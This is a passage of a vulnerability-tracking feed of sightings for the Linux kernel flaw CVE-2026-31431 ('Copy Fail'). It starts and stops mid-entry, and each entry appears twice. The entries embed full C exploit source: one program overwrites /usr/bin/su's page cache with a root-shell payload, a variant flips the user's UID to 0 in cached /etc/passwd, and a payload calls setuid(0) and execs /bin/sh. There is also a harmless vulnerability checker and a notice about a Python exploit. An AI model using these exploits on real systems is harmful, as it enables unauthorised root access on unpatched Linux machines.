plaintext destination, so the (failing)\n * decrypt has already overwritten 4 bytes of the page-cache page by\n * the time auth verification rejects the request. Walking 4 bytes at\n * a time across the payload deterministically writes the entire blob\n * into the cached image of /usr/bin/su. execve() of the target loads\n * the (mutated) cached pages; the unchanged on-disk inode is still\n * setuid root, so the kernel hands the payload root creds; payload\n * pivots into a real root shell.\n *\n * Affected kernels:\n * floor: torvalds/linux 72548b093ee3 (Aug 2017, 4.14, AF_ALG iov_iter\n * rework that introduced the file-page write primitive)\n * ceiling: torvalds/linux a664bf3d603d (Apr 2026, reverts the 2017\n * algif_aead in-place optimization; separates src/dst\n * scatterlists so page-cache pages can no longer be a writable\n * crypto destination)\n * in between: every Ubuntu, RHEL, SUSE, Amazon Linux, Debian etc.\n * distro kernel that didn't backport the fix.\n *\n * Build: see Makefile. (`make` in this directory.)\n */\n\n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n\n#include \n\n#include \"utils.h\"\n\n/* Symbols synthesized by `ld -r -b binary -o payload.o payload`. */\nextern const unsigned char _binary_payload_start[];\nextern const unsigned char _binary_payload_end[];\n#define PAYLOAD (_binary_payload_start)\n#define PAYLOAD_LEN ((size_t)(_binary_payload_end - _binary_payload_start))\n\nint main(int argc, char **argv) {\n const char *target = (argc > 1) ? argv[1] : \"/usr/bin/su\";\n\n int file_fd = open(target, O_RDONLY);\n if (file_fd < 0) {\n fprintf(stderr, \"open(%s): %s\\n\", target, strerror(errno));\n return 1;\n }\n\n size_t len = PAYLOAD_LEN;\n size_t iters = (len + 3) / 4;\n\n fprintf(stderr, \"[+] target: %s\\n\", target);\n fprintf(stderr, \"[+] payload: %zu bytes (%zu iterations)\\n\", len, iters);\n\n /* Walk the embedded payload in 4-byte windows. Last window is zero-\n * padded if PAYLOAD_LEN isn't a multiple of 4 (the extra bytes simply\n * land past end-of-payload in the page-cache page; harmless). */\n for (off_t off = 0; (size_t)off < len; off += 4) {\n unsigned char window[4] = { 0, 0, 0, 0 };\n size_t take = (len - (size_t)off >= 4) ? 4 : len - (size_t)off;\n memcpy(window, PAYLOAD + off, take);\n\n if (patch_chunk(file_fd, off, window) < 0) {\n fprintf(stderr, \"patch_chunk failed at offset %lld\\n\",\n (long long)off);\n return 1;\n }\n }\n\n close(file_fd);\n\n fprintf(stderr, \"[+] page cache mutated; exec'ing target\\n\");\n execl(\"/bin/sh\", \"sh\", \"-c\", \"su\", (char *)NULL);\n perror(\"execl\");\n return 1;\n}", "creation_timestamp": "2026-06-04T07:19:08.000000Z"} https://vulnerability.circl.lu/sighting/443a0012-c304-40bd-906e-b2279a829e92/export Thu, 04 Jun 2026 07:19:08 +0000 https://vulnerability.circl.lu/sighting/50f046f9-7d39-4209-af7a-ce35b111426d/export {"uuid": "50f046f9-7d39-4209-af7a-ce35b111426d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/spynika/5a7493888e350d8c96772bff995cef0f", "content": "/* SPDX-License-Identifier: LGPL-2.1-or-later OR MIT */\n/*\n * Copy Fail -- CVE-2026-31431 -- /etc/passwd UID-flip variant.\n *\n * Mutates /etc/passwd's page cache to set the running user's UID field\n * to \"0000\", then execs `su `. PAM authenticates against\n * /etc/shadow (untouched) using the user's real password; on success,\n * su's setuid() reads the corrupted /etc/passwd from the page cache and\n * lands in a root shell.\n *\n * Compared to exploit.c (the binary-mutation variant), this works on\n * any system where /etc/passwd is world-readable (every standard Linux\n * system) including environments that harden setuid binaries against\n * unprivileged read access.\n *\n */\n\n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n#include \n\n#include \n\n#include \"utils.h\"\n\n/* Find the byte offset of the UID field for `username` in /etc/passwd.\n * Returns -1 on error or if the user is not found. */\nstatic off_t find_uid_offset(const char *username) {\n int fd = open(\"/etc/passwd\", O_RDONLY);\n if (fd < 0) { perror(\"open(/etc/passwd)\"); return -1; }\n\n char buf[65536];\n ssize_t n = read(fd, buf, sizeof buf - 1);\n close(fd);\n if (n <= 0) { perror(\"read(/etc/passwd)\"); return -1; }\n buf[n] = '\\0';\n\n size_t namelen = strlen(username);\n char *line = buf;\n while (line < buf + n) {\n char *eol = memchr(line, '\\n', (buf + n) - line);\n size_t linelen = eol ? (size_t)(eol - line) : (size_t)((buf + n) - line);\n\n if (linelen > namelen + 1 &&\n memcmp(line, username, namelen) == 0 &&\n line[namelen] == ':') {\n /* line: name:x:UID:GID:gecos:home:shell */\n char *colon1 = memchr(line, ':', linelen);\n if (!colon1) break;\n char *colon2 = memchr(colon1 + 1, ':', linelen - (size_t)(colon1 + 1 - line));\n if (!colon2) break;\n return (off_t)((colon2 + 1) - buf);\n }\n if (!eol) break;\n line = eol + 1;\n }\n\n fprintf(stderr, \"[-] could not find user %s in /etc/passwd\\n\", username);\n return -1;\n}\n\nint main(void) {\n uid_t uid = getuid();\n struct passwd *pw = getpwuid(uid);\n if (!pw) { perror(\"getpwuid\"); return 1; }\n\n fprintf(stderr, \"[+] user: %s (uid=%u)\\n\", pw->pw_name, uid);\n\n off_t uid_offset = find_uid_offset(pw->pw_name);\n if (uid_offset < 0) return 1;\n\n fprintf(stderr, \"[+] /etc/passwd UID field at offset %lld\\n\",\n (long long)uid_offset);\n\n\n int fd = open(\"/etc/passwd\", O_RDONLY);\n if (fd < 0) { perror(\"open(/etc/passwd)\"); return 1; }\n \n /* Read up to 10 digits starting at uid_offset to find the field length. */\n char fieldbuf[12] = { 0 };\n ssize_t nr = pread(fd, fieldbuf, sizeof fieldbuf - 1, uid_offset);\n if (nr < 1) { perror(\"pread\"); close(fd); return 1; }\n\n /* Find length of the existing UID field (up to next ':') */\n int old_uid_len = 0;\n while (old_uid_len < nr && fieldbuf[old_uid_len] != ':')\n old_uid_len++;\n\n if (old_uid_len == 0 || old_uid_len > 10) {\n fprintf(stderr, \"[-] could not determine UID field length\\n\");\n close(fd); return 1;\n }\n\n /* Left-pad old_uid_len.\n * /etc/passwd allows leading zeros so 0000 is uid 0. */\n char padded[11];\n memset(padded, '0', old_uid_len);\n padded[old_uid_len] = '\\0';\n\n fprintf(stderr, \"[+] old field: \\\"%.*s\\\" (%d bytes), new field: \\\"%s\\\" (%d bytes)\\n\",\n old_uid_len, fieldbuf, old_uid_len, padded, old_uid_len);\n\n /* New sanity check: verify the existing field matches getuid() to avoid corrupting /etc/passwd */\n char expected[11];\n snprintf(expected, sizeof expected, \"%u\", uid);\n int expected_len = (int)strlen(expected);\n if (old_uid_len < expected_len ||\n memcmp(fieldbuf + old_uid_len - expected_len, expected, expected_len) != 0) {\n fprintf(stderr,\n \"[-] sanity check failed: field \\\"%.*s\\\" doesn't end with \"\n \"expected uid \\\"%s\\\"\\n\",\n old_uid_len, fieldbuf, expected);\n close(fd); return 1;\n }\n fprintf(stderr, \"[+] sanity check ok\\n\");\n\n /* Patch in 4-byte chunks. Read-modify-write for the final chunk if partial */\n for (int off = 0; off < old_uid_len; off += 4) {\n unsigned char chunk[4];\n int n = old_uid_len - off < 4 ? old_uid_len - off : 4;\n\n if (n < 4 && pread(fd, chunk, 4, uid_offset + off) != 4) {\n perror(\"pread on final chunk\");\n close(fd); return 1;\n }\n memcpy(chunk, padded + off, n);\n\n if (patch_chunk(fd, uid_offset + off, chunk) < 0) {\n fprintf(stderr, \"[-] page-cache mutation failed at offset %lld\\n\",\n (long long)(uid_offset + off));\n close(fd); return 1;\n }\n }\n\n close(fd);\n\n fprintf(stderr,\n \"[+] /etc/passwd page cache mutated; %s's UID is now %s\\n\",\n pw->pw_name, padded);\n fprintf(stderr,\n \"[+] attempting cashout via `su %s`\\n\", pw->pw_name);\n fprintf(stderr,\n \"[!] If su fails with \\\"Cannot determine your user name\\\"\\n\"\n \" (shadow-utils' caller-identity check), the page cache\\n\"\n \" mutation is still active. Pivot to another cashout\\n\"\n \" that consults /etc/passwd.\\n\");\n fprintf(stderr,\n \"[+] cleanup after testing (run as root):\\n\"\n \" echo 3 > /proc/sys/vm/drop_caches\\n\\n\");\n\n execlp(\"su\", \"su\", pw->pw_name, (char *)NULL);\n perror(\"execlp(su)\");\n return 1;\n}", "creation_timestamp": "2026-06-04T07:19:53.000000Z"} {"uuid": "50f046f9-7d39-4209-af7a-ce35b111426d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/spynika/5a7493888e350d8c96772bff995cef0f", "content": "/* SPDX-License-Identifier: LGPL-2.1-or-later OR MIT */\n/*\n * Copy Fail -- CVE-2026-31431 -- /etc/passwd UID-flip variant.\n *\n * Mutates /etc/passwd's page cache to set the running user's UID field\n * to \"0000\", then execs `su `. PAM authenticates against\n * /etc/shadow (untouched) using the user's real password; on success,\n * su's setuid() reads the corrupted /etc/passwd from the page cache and\n * lands in a root shell.\n *\n * Compared to exploit.c (the binary-mutation variant), this works on\n * any system where /etc/passwd is world-readable (every standard Linux\n * system) including environments that harden setuid binaries against\n * unprivileged read access.\n *\n */\n\n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n#include \n\n#include \n\n#include \"utils.h\"\n\n/* Find the byte offset of the UID field for `username` in /etc/passwd.\n * Returns -1 on error or if the user is not found. */\nstatic off_t find_uid_offset(const char *username) {\n int fd = open(\"/etc/passwd\", O_RDONLY);\n if (fd < 0) { perror(\"open(/etc/passwd)\"); return -1; }\n\n char buf[65536];\n ssize_t n = read(fd, buf, sizeof buf - 1);\n close(fd);\n if (n <= 0) { perror(\"read(/etc/passwd)\"); return -1; }\n buf[n] = '\\0';\n\n size_t namelen = strlen(username);\n char *line = buf;\n while (line < buf + n) {\n char *eol = memchr(line, '\\n', (buf + n) - line);\n size_t linelen = eol ? (size_t)(eol - line) : (size_t)((buf + n) - line);\n\n if (linelen > namelen + 1 &&\n memcmp(line, username, namelen) == 0 &&\n line[namelen] == ':') {\n /* line: name:x:UID:GID:gecos:home:shell */\n char *colon1 = memchr(line, ':', linelen);\n if (!colon1) break;\n char *colon2 = memchr(colon1 + 1, ':', linelen - (size_t)(colon1 + 1 - line));\n if (!colon2) break;\n return (off_t)((colon2 + 1) - buf);\n }\n if (!eol) break;\n line = eol + 1;\n }\n\n fprintf(stderr, \"[-] could not find user %s in /etc/passwd\\n\", username);\n return -1;\n}\n\nint main(void) {\n uid_t uid = getuid();\n struct passwd *pw = getpwuid(uid);\n if (!pw) { perror(\"getpwuid\"); return 1; }\n\n fprintf(stderr, \"[+] user: %s (uid=%u)\\n\", pw->pw_name, uid);\n\n off_t uid_offset = find_uid_offset(pw->pw_name);\n if (uid_offset < 0) return 1;\n\n fprintf(stderr, \"[+] /etc/passwd UID field at offset %lld\\n\",\n (long long)uid_offset);\n\n\n int fd = open(\"/etc/passwd\", O_RDONLY);\n if (fd < 0) { perror(\"open(/etc/passwd)\"); return 1; }\n \n /* Read up to 10 digits starting at uid_offset to find the field length. */\n char fieldbuf[12] = { 0 };\n ssize_t nr = pread(fd, fieldbuf, sizeof fieldbuf - 1, uid_offset);\n if (nr < 1) { perror(\"pread\"); close(fd); return 1; }\n\n /* Find length of the existing UID field (up to next ':') */\n int old_uid_len = 0;\n while (old_uid_len < nr && fieldbuf[old_uid_len] != ':')\n old_uid_len++;\n\n if (old_uid_len == 0 || old_uid_len > 10) {\n fprintf(stderr, \"[-] could not determine UID field length\\n\");\n close(fd); return 1;\n }\n\n /* Left-pad old_uid_len.\n * /etc/passwd allows leading zeros so 0000 is uid 0. */\n char padded[11];\n memset(padded, '0', old_uid_len);\n padded[old_uid_len] = '\\0';\n\n fprintf(stderr, \"[+] old field: \\\"%.*s\\\" (%d bytes), new field: \\\"%s\\\" (%d bytes)\\n\",\n old_uid_len, fieldbuf, old_uid_len, padded, old_uid_len);\n\n /* New sanity check: verify the existing field matches getuid() to avoid corrupting /etc/passwd */\n char expected[11];\n snprintf(expected, sizeof expected, \"%u\", uid);\n int expected_len = (int)strlen(expected);\n if (old_uid_len < expected_len ||\n memcmp(fieldbuf + old_uid_len - expected_len, expected, expected_len) != 0) {\n fprintf(stderr,\n \"[-] sanity check failed: field \\\"%.*s\\\" doesn't end with \"\n \"expected uid \\\"%s\\\"\\n\",\n old_uid_len, fieldbuf, expected);\n close(fd); return 1;\n }\n fprintf(stderr, \"[+] sanity check ok\\n\");\n\n /* Patch in 4-byte chunks. Read-modify-write for the final chunk if partial */\n for (int off = 0; off < old_uid_len; off += 4) {\n unsigned char chunk[4];\n int n = old_uid_len - off < 4 ? old_uid_len - off : 4;\n\n if (n < 4 && pread(fd, chunk, 4, uid_offset + off) != 4) {\n perror(\"pread on final chunk\");\n close(fd); return 1;\n }\n memcpy(chunk, padded + off, n);\n\n if (patch_chunk(fd, uid_offset + off, chunk) < 0) {\n fprintf(stderr, \"[-] page-cache mutation failed at offset %lld\\n\",\n (long long)(uid_offset + off));\n close(fd); return 1;\n }\n }\n\n close(fd);\n\n fprintf(stderr,\n \"[+] /etc/passwd page cache mutated; %s's UID is now %s\\n\",\n pw->pw_name, padded);\n fprintf(stderr,\n \"[+] attempting cashout via `su %s`\\n\", pw->pw_name);\n fprintf(stderr,\n \"[!] If su fails with \\\"Cannot determine your user name\\\"\\n\"\n \" (shadow-utils' caller-identity check), the page cache\\n\"\n \" mutation is still active. Pivot to another cashout\\n\"\n \" that consults /etc/passwd.\\n\");\n fprintf(stderr,\n \"[+] cleanup after testing (run as root):\\n\"\n \" echo 3 > /proc/sys/vm/drop_caches\\n\\n\");\n\n execlp(\"su\", \"su\", pw->pw_name, (char *)NULL);\n perror(\"execlp(su)\");\n return 1;\n}", "creation_timestamp": "2026-06-04T07:19:53.000000Z"} https://vulnerability.circl.lu/sighting/50f046f9-7d39-4209-af7a-ce35b111426d/export Thu, 04 Jun 2026 07:19:53 +0000 https://vulnerability.circl.lu/sighting/65efbe6d-61fa-48d2-8e56-b2c261050a2b/export {"uuid": "65efbe6d-61fa-48d2-8e56-b2c261050a2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/spynika/01d9eed1d55745f89a77a3cbee9144c9", "content": "/* SPDX-License-Identifier: LGPL-2.1-or-later OR MIT */\n/*\n * Copy Fail (CVE-2026-31431) -- payload.\n *\n * Cross-platform C payload by Tony Gies .\n *\n * Cross-platform shellcode, built against the kernel's nolibc/ tiny libc.\n * payload.c is plain portable C; the per-arch syscall asm lives in\n * nolibc/arch-*.h. Supported architectures (per nolibc upstream): x86_64,\n * i386, arm, aarch64, riscv32/64, mips, ppc, s390x, loongarch, m68k, sh,\n * sparc.\n *\n * nolibc doesn't ship setuid/setgid wrappers, so we use its variadic\n * syscall() macro (nolibc/sys/syscall.h) with __NR_* constants from the\n * toolchain's . Still no embedded asm in this file.\n *\n * Runtime story: the dropper writes these bytes over the head of\n * /usr/bin/su's page-cache pages. su's on-disk inode keeps its setuid-\n * root bit, so on execve() the kernel grants effective uid 0 and then\n * loads *these* bytes from the cache as the program. main() converts\n * the ephemeral suid grant into a full root identity, then execs /bin/sh.\n *\n * Build: see Makefile. (`make` in this directory.)\n */\n\n#include \"nolibc/nolibc.h\"\n\n/* nolibc doesn't ship setuid/setgid wrappers (the kernel selftests it's\n * designed for don't need them). It does ship a portable variadic\n * syscall() macro (see nolibc/sys/syscall.h) and an execve(). The\n * __NR_* constants come from the toolchain's . */\n\nint main(void) {\n char *argv[] = { \"sh\", (char *)NULL };\n char *envp[] = { (char *)NULL };\n syscall(__NR_setgid, 0);\n syscall(__NR_setuid, 0);\n execve(\"/bin/sh\", argv, envp);\n return 1;\n}", "creation_timestamp": "2026-06-04T07:21:57.000000Z"} {"uuid": "65efbe6d-61fa-48d2-8e56-b2c261050a2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/spynika/01d9eed1d55745f89a77a3cbee9144c9", "content": "/* SPDX-License-Identifier: LGPL-2.1-or-later OR MIT */\n/*\n * Copy Fail (CVE-2026-31431) -- payload.\n *\n * Cross-platform C payload by Tony Gies .\n *\n * Cross-platform shellcode, built against the kernel's nolibc/ tiny libc.\n * payload.c is plain portable C; the per-arch syscall asm lives in\n * nolibc/arch-*.h. Supported architectures (per nolibc upstream): x86_64,\n * i386, arm, aarch64, riscv32/64, mips, ppc, s390x, loongarch, m68k, sh,\n * sparc.\n *\n * nolibc doesn't ship setuid/setgid wrappers, so we use its variadic\n * syscall() macro (nolibc/sys/syscall.h) with __NR_* constants from the\n * toolchain's . Still no embedded asm in this file.\n *\n * Runtime story: the dropper writes these bytes over the head of\n * /usr/bin/su's page-cache pages. su's on-disk inode keeps its setuid-\n * root bit, so on execve() the kernel grants effective uid 0 and then\n * loads *these* bytes from the cache as the program. main() converts\n * the ephemeral suid grant into a full root identity, then execs /bin/sh.\n *\n * Build: see Makefile. (`make` in this directory.)\n */\n\n#include \"nolibc/nolibc.h\"\n\n/* nolibc doesn't ship setuid/setgid wrappers (the kernel selftests it's\n * designed for don't need them). It does ship a portable variadic\n * syscall() macro (see nolibc/sys/syscall.h) and an execve(). The\n * __NR_* constants come from the toolchain's . */\n\nint main(void) {\n char *argv[] = { \"sh\", (char *)NULL };\n char *envp[] = { (char *)NULL };\n syscall(__NR_setgid, 0);\n syscall(__NR_setuid, 0);\n execve(\"/bin/sh\", argv, envp);\n return 1;\n}", "creation_timestamp": "2026-06-04T07:21:57.000000Z"} https://vulnerability.circl.lu/sighting/65efbe6d-61fa-48d2-8e56-b2c261050a2b/export Thu, 04 Jun 2026 07:21:57 +0000 https://vulnerability.circl.lu/sighting/eeea1d39-2102-4e2c-bf7f-42510e37beec/export {"uuid": "eeea1d39-2102-4e2c-bf7f-42510e37beec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/spynika/e452783668ff5a7a3dc4cc036d3f9463", "content": "/* SPDX-License-Identifier: LGPL-2.1-or-later OR MIT */\n/*\n * Copy Fail -- CVE-2026-31431\n * Vulnerability checker.\n *\n * Detects whether the running kernel is susceptible to the AF_ALG/splice\n * page-cache mutation primitive used by exploit.c and exploit-passwd.c,\n * without touching any system file. Creates a local \"testfile\" in the\n * working directory containing the string \"init\", then runs the same\n * patch_chunk() primitive against its page cache to attempt to overwrite\n * the bytes with \"vulnerable\". Reads back to confirm whether the\n * mutation took.\n *\n * The on-disk inode is never modified; the testfile is removed on exit,\n * and the page-cache mutation evaporates with it. Runs unprivileged.\n *\n * Exit codes:\n * 100 - kernel is vulnerable\n * 0 - kernel is not vulnerable (primitive ran but mutation did not take)\n * 2 - AF_ALG socket family or authencesn template is unavailable;\n * patch state cannot be determined from this test\n * 1 - other runtime error\n */\n\n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n#include \n\n#include \n\n#include \"utils.h\"\n\nstatic const char PAYLOAD[] = \"vulnerable\";\n#define PAYLOAD_LEN (sizeof PAYLOAD - 1)\n\nstatic int check_file(const char *filename) {\n int fd = open(filename, O_RDONLY);\n if (fd < 0) return 0;\n printf(\"content of %s fd=%d ---\\n\", filename, fd);\n char buf[256];\n ssize_t total = read(fd, buf, sizeof buf);\n if (total > 0)\n write(STDOUT_FILENO, buf, total);\n close(fd);\n printf(\"\\n---\\n\");\n return total >= (ssize_t)PAYLOAD_LEN &&\n memcmp(buf, PAYLOAD, PAYLOAD_LEN) == 0;\n}\n\nstatic void init_file(const char *filename) {\n static const char init_buf[32] = \"init\";\n int fd = open(filename, O_RDWR | O_CREAT | O_TRUNC, 0644);\n if (fd < 0) {\n fprintf(stderr, \"open(%s): %s\\n\", filename, strerror(errno));\n exit(1);\n }\n write(fd, init_buf, sizeof init_buf);\n close(fd);\n}\n\nint main(int argc, char **argv) {\n (void)argc; (void)argv;\n const char *target = \"testfile\";\n\n init_file(target);\n sync();\n check_file(target);\n\n int file_fd = open(target, O_RDONLY);\n if (file_fd < 0) {\n fprintf(stderr, \"open(%s): %s\\n\", target, strerror(errno));\n unlink(target);\n return 1;\n }\n\n size_t iters = (PAYLOAD_LEN + 3) / 4;\n\n fprintf(stderr, \"[+] target: %s\\n\", target);\n fprintf(stderr, \"[+] payload: %zu bytes (%zu iterations)\\n\",\n PAYLOAD_LEN, iters);\n\n /* Walk the payload in 4-byte windows. window[] is 5 bytes so the\n * trailing zero acts as a NUL terminator for the %s log below. */\n for (off_t off = 0; (size_t)off < PAYLOAD_LEN; off += 4) {\n unsigned char window[5] = { 0, 0, 0, 0, 0 };\n size_t take = (PAYLOAD_LEN - (size_t)off >= 4)\n ? 4 : PAYLOAD_LEN - (size_t)off;\n memcpy(window, PAYLOAD + off, take);\n\n fprintf(stderr, \"[+] patch fd=%d off=%lld bytes=\\\"%s\\\"\\n\",\n file_fd, (long long)off, window);\n if (patch_chunk(file_fd, off, window) < 0) {\n int ret;\n if (errno == EAFNOSUPPORT) {\n fprintf(stderr,\n \"[?] AF_ALG socket family unavailable; kernel patch \"\n \"state cannot be determined from this test\\n\");\n ret = 2;\n } else if (errno == ENOENT) {\n fprintf(stderr,\n \"[?] AF_ALG authencesn template not registered; \"\n \"kernel patch state cannot be determined from this \"\n \"test\\n\");\n ret = 2;\n } else {\n fprintf(stderr, \"[-] patch_chunk failed at offset %lld\\n\",\n (long long)off);\n ret = 1;\n }\n\n close(file_fd);\n unlink(target);\n return ret;\n }\n fprintf(stderr, \"[+] patch ok\\n\");\n }\n\n close(file_fd);\n\n fprintf(stderr, \"[+] page cache mutated\\n\");\n\n int vulnerable = check_file(target);\n unlink(target);\n\n if (vulnerable) {\n fprintf(stderr, \"[!] VULNERABLE\\n\");\n return 100;\n }\n\n fprintf(stderr, \"[+] not vulnerable :)\\n\");\n return 0;\n}", "creation_timestamp": "2026-06-04T07:22:41.000000Z"} {"uuid": "eeea1d39-2102-4e2c-bf7f-42510e37beec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/spynika/e452783668ff5a7a3dc4cc036d3f9463", "content": "/* SPDX-License-Identifier: LGPL-2.1-or-later OR MIT */\n/*\n * Copy Fail -- CVE-2026-31431\n * Vulnerability checker.\n *\n * Detects whether the running kernel is susceptible to the AF_ALG/splice\n * page-cache mutation primitive used by exploit.c and exploit-passwd.c,\n * without touching any system file. Creates a local \"testfile\" in the\n * working directory containing the string \"init\", then runs the same\n * patch_chunk() primitive against its page cache to attempt to overwrite\n * the bytes with \"vulnerable\". Reads back to confirm whether the\n * mutation took.\n *\n * The on-disk inode is never modified; the testfile is removed on exit,\n * and the page-cache mutation evaporates with it. Runs unprivileged.\n *\n * Exit codes:\n * 100 - kernel is vulnerable\n * 0 - kernel is not vulnerable (primitive ran but mutation did not take)\n * 2 - AF_ALG socket family or authencesn template is unavailable;\n * patch state cannot be determined from this test\n * 1 - other runtime error\n */\n\n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n#include \n\n#include \n\n#include \"utils.h\"\n\nstatic const char PAYLOAD[] = \"vulnerable\";\n#define PAYLOAD_LEN (sizeof PAYLOAD - 1)\n\nstatic int check_file(const char *filename) {\n int fd = open(filename, O_RDONLY);\n if (fd < 0) return 0;\n printf(\"content of %s fd=%d ---\\n\", filename, fd);\n char buf[256];\n ssize_t total = read(fd, buf, sizeof buf);\n if (total > 0)\n write(STDOUT_FILENO, buf, total);\n close(fd);\n printf(\"\\n---\\n\");\n return total >= (ssize_t)PAYLOAD_LEN &&\n memcmp(buf, PAYLOAD, PAYLOAD_LEN) == 0;\n}\n\nstatic void init_file(const char *filename) {\n static const char init_buf[32] = \"init\";\n int fd = open(filename, O_RDWR | O_CREAT | O_TRUNC, 0644);\n if (fd < 0) {\n fprintf(stderr, \"open(%s): %s\\n\", filename, strerror(errno));\n exit(1);\n }\n write(fd, init_buf, sizeof init_buf);\n close(fd);\n}\n\nint main(int argc, char **argv) {\n (void)argc; (void)argv;\n const char *target = \"testfile\";\n\n init_file(target);\n sync();\n check_file(target);\n\n int file_fd = open(target, O_RDONLY);\n if (file_fd < 0) {\n fprintf(stderr, \"open(%s): %s\\n\", target, strerror(errno));\n unlink(target);\n return 1;\n }\n\n size_t iters = (PAYLOAD_LEN + 3) / 4;\n\n fprintf(stderr, \"[+] target: %s\\n\", target);\n fprintf(stderr, \"[+] payload: %zu bytes (%zu iterations)\\n\",\n PAYLOAD_LEN, iters);\n\n /* Walk the payload in 4-byte windows. window[] is 5 bytes so the\n * trailing zero acts as a NUL terminator for the %s log below. */\n for (off_t off = 0; (size_t)off < PAYLOAD_LEN; off += 4) {\n unsigned char window[5] = { 0, 0, 0, 0, 0 };\n size_t take = (PAYLOAD_LEN - (size_t)off >= 4)\n ? 4 : PAYLOAD_LEN - (size_t)off;\n memcpy(window, PAYLOAD + off, take);\n\n fprintf(stderr, \"[+] patch fd=%d off=%lld bytes=\\\"%s\\\"\\n\",\n file_fd, (long long)off, window);\n if (patch_chunk(file_fd, off, window) < 0) {\n int ret;\n if (errno == EAFNOSUPPORT) {\n fprintf(stderr,\n \"[?] AF_ALG socket family unavailable; kernel patch \"\n \"state cannot be determined from this test\\n\");\n ret = 2;\n } else if (errno == ENOENT) {\n fprintf(stderr,\n \"[?] AF_ALG authencesn template not registered; \"\n \"kernel patch state cannot be determined from this \"\n \"test\\n\");\n ret = 2;\n } else {\n fprintf(stderr, \"[-] patch_chunk failed at offset %lld\\n\",\n (long long)off);\n ret = 1;\n }\n\n close(file_fd);\n unlink(target);\n return ret;\n }\n fprintf(stderr, \"[+] patch ok\\n\");\n }\n\n close(file_fd);\n\n fprintf(stderr, \"[+] page cache mutated\\n\");\n\n int vulnerable = check_file(target);\n unlink(target);\n\n if (vulnerable) {\n fprintf(stderr, \"[!] VULNERABLE\\n\");\n return 100;\n }\n\n fprintf(stderr, \"[+] not vulnerable :)\\n\");\n return 0;\n}", "creation_timestamp": "2026-06-04T07:22:41.000000Z"} https://vulnerability.circl.lu/sighting/eeea1d39-2102-4e2c-bf7f-42510e37beec/export Thu, 04 Jun 2026 07:22:41 +0000 https://vulnerability.circl.lu/sighting/aef80f67-0e53-4b34-bf53-75885348b67d/export {"uuid": "aef80f67-0e53-4b34-bf53-75885348b67d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/87353", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #Exploit #CVE\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copy-fail-CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a zs1n\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-06-05 01:06:02\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nExploit for Copy-Fail Vulnerability - Python3 Version\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-06-05T01:07:13.000000Z"} {"uuid": "aef80f67-0e53-4b34-bf53-75885348b67d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/87353", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #Exploit #CVE\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copy-fail-CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a zs1n\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-06-05 01:06:02\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nExploit for Copy-Fail Vulnerability - Python3 Version\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-06-05T01:07:13.000000Z"} https://vulnerability.circl.lu/sighting/aef80f67-0e53-4b34-bf53-75885348b67d/export Fri, 05 Jun 2026 01:07:13 +0000 https://vulnerability.circl.lu/sighting/918e2870-5e1d-45ca-876a-34ec3976e654/export {"uuid": "918e2870-5e1d-45ca-876a-34ec3976e654", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": 